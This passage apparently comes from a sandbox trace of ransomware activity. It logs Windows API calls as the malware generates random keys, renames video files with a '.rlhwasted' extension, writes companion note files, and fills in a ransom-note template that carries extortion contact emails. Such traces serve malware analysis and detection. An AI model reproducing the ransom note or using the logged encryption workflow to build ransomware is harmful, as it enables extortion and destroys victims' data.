Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WBmpzygdQg1GOt0b1w3sUuJdGjj7tF837biy0SGUaSVtepPBIkz4eXR73Gthd4Rj\r\nss9yKlLrlY2ptwlYB6qDqg10PLJd0K4uHA6OMipMt1PVgOx1B1LzI8usXb+5ni+z\r\nZi+Es2S61YMpPwt6OlZtSuwkqX1WgGGjQDye6Uz0ehlkq0z1yew10VnnwmrOV5or\r\n28/XDtl0lEa2vWx8ljpB0Dw8Nk7QYqFEduU3dPftYgmySxIIR1wMMUyTKzxHAX4P\r\nyI6hDPxUElJYNuImKV7crXQ3VY3ul12cnpPY8Pujqd/MUoe2fu4QbHmpcLwXr7Up\r\n1HxapZ2d5qFLYyi3Uw9ZMD4lkoS09iXJLU3egLpSu7mF8TF3v63LjKxvj6cxu32M\r\nG8tWjcF5bMaol2vjmjdYMkD4G30gMem3Pvb8Dq2/f4bXyLAVGbiVmtLasms8hzWm\r\nfeH7mr5kwKKkORyOrh169zf9MhOl9dJbOI1zfcdf7fSH/HWsctVJQa2T+3zSWB+8\r\nGzzCSEk/3xAZ3tIuxJNig+vO2ojDwNMRE9py79LNdifNnacAxlspU0eYF0fc5sr8\r\nLbJ7l2GHspTQPrC2XXLMXrf5XZyYBuUtgqyQteT1D/NuYxPR+BFAGhTeWYBuok1O\r\n3VcuQCaZObC5pLW/eGm+XrqquaQYcY2p66u2OaigIkW=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.139] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.140] SetEndOfFile (hFile=0x104) returned 1 [0197.142] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.142] CloseHandle (hObject=0x104) returned 1 [0197.144] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0197.144] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9e48 | out: hHeap=0x6b0000) returned 1 [0197.144] _aulldvrm () returned 0x0 [0197.145] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.146] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.146] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.146] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WkViNYe9rt6h.mkv") returned 57 [0197.146] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27c) returned 0x707f58 [0197.146] lstrcpyW (in: lpString1=0x707fca, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.146] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.146] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.184] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.184] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WkViNYe9rt6h.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wkvinye9rt6h.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.244] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.246] SetEndOfFile (hFile=0x104) returned 1 [0197.246] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.246] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.246] lstrcpyW (in: lpString1=0x707fca, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WkViNYe9rt6h.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wkvinye9rt6h.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WkViNYe9rt6h.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wkvinye9rt6h.mkv.rlhwasted")) returned 1 [0197.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WkViNYe9rt6h.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wkvinye9rt6h.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.247] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0197.247] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xb0d4 [0197.247] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb0d4) returned 0x6a0000 [0197.248] CloseHandle (hObject=0x128) returned 1 [0197.251] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.252] CloseHandle (hObject=0x10c) returned 1 [0197.252] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6d4580 [0197.252] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.253] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6d45c8 | out: pbBuffer=0x6d45c8) returned 1 [0197.253] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.253] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.254] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.254] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.263] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0197.263] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0197.263] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.263] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]krZgpS1sG3v5owsrO6VDnHzDzU1sL3mESsPZ5ZkP7Eqln9jaCN5/R0xECVHMBMhO\r\nBeX2a2T1/upKfGdBhRC9stb1yE/k4Y97d9ttwlNQ3wQOz+syXK7ju/wyez/m6y4x\r\n417EG8V2ijxO/ow6r5BlEmQy2eOanPAdu715l3mkfAwuyti5aGqWxOq1RFRJk9VD\r\nMVXztaNRyIoqemukJhikQDudwGmuF2gJHJfC6xF2LD8PpDXnh3hVnlHkqKGO1Bh3\r\nIJH4TSti0Zu62iff4kV3XzMsaRUyMKfdIRc+RNf5ZZJ3AuciInLUyBg5NenHH4Y+\r\nB3jvvWf+ONcPl5v1xhTpkALe/WWofJKBtVCXLNgK6M8PMshLBOhbOiwVSKlJiaEB\r\n3I3ZFT/AisqvTJxyLoeVMKTvObO32pvTAFey7I4V25PxV9YnE/12/N8Gv2a1e8qE\r\n9+6i8iriIYywR1viuD/i4AFduuT6z/YrUom4cJKY5CpnJnl+v5iH/sf4ckGTmvyy\r\nQBVR3TvCYCvDJZdWDto/XBkQYe4lA/97+y6aOmSxacsZkXr+vYajBfGzHHUN5cPB\r\ndSQg4WYFVr6qWzyw3e/Aw9yO62pczWvjvV5om0faujGCZk9e9llQCa39VC3JX8a5\r\nJmFoNLq8OVqnh+kghbUx25C91dKxxG30WQKpbC6JA9q=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.263] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.263] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.263] SetEndOfFile (hFile=0x104) returned 1 [0197.265] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.265] CloseHandle (hObject=0x104) returned 1 [0197.267] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0197.267] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7062b0 | out: hHeap=0x6b0000) returned 1 [0197.267] _aulldvrm () returned 0x0 [0197.267] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.268] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.268] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\-k70s6NAEPzOgko0K4R.swf") returned 111 [0197.268] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2e8) returned 0x6e7988 [0197.268] lstrcpyW (in: lpString1=0x6e7a66, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.268] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.268] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.269] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.269] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\-k70s6NAEPzOgko0K4R.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\-k70s6naepzogko0k4r.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.270] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.271] SetEndOfFile (hFile=0x104) returned 1 [0197.271] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.271] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.271] lstrcpyW (in: lpString1=0x6e7a66, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\-k70s6NAEPzOgko0K4R.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\-k70s6naepzogko0k4r.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\-k70s6NAEPzOgko0K4R.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\-k70s6naepzogko0k4r.swf.rlhwasted")) returned 1 [0197.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\-k70s6NAEPzOgko0K4R.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\-k70s6naepzogko0k4r.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0197.275] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0197.275] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xc142 [0197.275] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc142) returned 0x6a0000 [0197.275] CloseHandle (hObject=0x10c) returned 1 [0197.279] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.432] CloseHandle (hObject=0x128) returned 1 [0197.432] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.432] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.433] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.433] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.433] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.434] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.434] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.444] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.444] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.444] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.444] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HVmBP/Sle1Etjr4/B+ZksLUgfy1JZPyb6GBabX6tas1URZmnTNQkm6P4peX1P/kn\r\nwCFALmojQB7CP2KT/blwklgaDcOlFwHzbvSLE0wCvBAAPi6D/9zWXaEBUGRqJ9YK\r\nGQTAsUeLvp/h1skXvfSz+ifw1DnndNRRYr/bbvc3D1ShA5vFAD/gsnbrSgoXd/+A\r\nLlW1RKbmUQNueVopa/Lsz32DB4bCSCg0TX/5DAR/HgSNibwH04HVpTGfy+G/tzwr\r\nlszF5LCd9H2I3u2xhKUgKMV2AHaa0D/nMH25ZQejnh90BvG5/QQnMX7tlsLTksg9\r\n1+J5Geun2Vn7pJnigvjLI6oC1Xv44q/IMl9N888C2tNbD4wJEHidnRW2bRQFwgYt\r\nNhSxgODqsFyZU4u7p72luRDRu+E9B3gnFEgerSsktfUXb1PRq9FqPnalG8EQjEWm\r\nvV+qIDEyfnaLdfYO14EQdS9V7QZwpRymWiuslGBIBYA9Vsy4d7pkZI8KSCSQbqbU\r\nhFDipeXNaC7v/8Vv5b63xiO0cdvf+xHi8R2+QEKd/qHaeui0xCR6/s4B0eSKbqEm\r\ngweJEXi4/j0PS1xsIEQIcrpdgXW673VHfvsnrBd8t9wmx/y2cFJSH1BEhUssmp/6\r\nwXmgN1PxCexZYAfFfpA2/xnPkZ3PLnUNNKPqyDrO1IL=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.444] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.444] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.444] SetEndOfFile (hFile=0x104) returned 1 [0197.446] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.446] CloseHandle (hObject=0x104) returned 1 [0197.449] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.449] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704d18 | out: hHeap=0x6b0000) returned 1 [0197.449] _aulldvrm () returned 0x0 [0197.449] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.450] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.450] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.450] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\aMkmXN49J80kR.swf") returned 114 [0197.450] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ee) returned 0x6e7988 [0197.450] lstrcpyW (in: lpString1=0x6e7a6c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.450] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.450] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.451] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0197.451] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\aMkmXN49J80kR.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\amkmxn49j80kr.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.455] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.456] SetEndOfFile (hFile=0x104) returned 1 [0197.456] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.456] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.456] lstrcpyW (in: lpString1=0x6e7a6c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\aMkmXN49J80kR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\amkmxn49j80kr.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\aMkmXN49J80kR.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\amkmxn49j80kr.swf.rlhwasted")) returned 1 [0197.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\aMkmXN49J80kR.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\amkmxn49j80kr.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.457] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0197.458] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x1a56 [0197.458] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a56) returned 0x6a0000 [0197.458] CloseHandle (hObject=0x128) returned 1 [0197.460] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.460] CloseHandle (hObject=0x108) returned 1 [0197.460] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.460] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.461] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.461] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.461] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.462] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.462] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.470] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.470] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.470] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.470] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 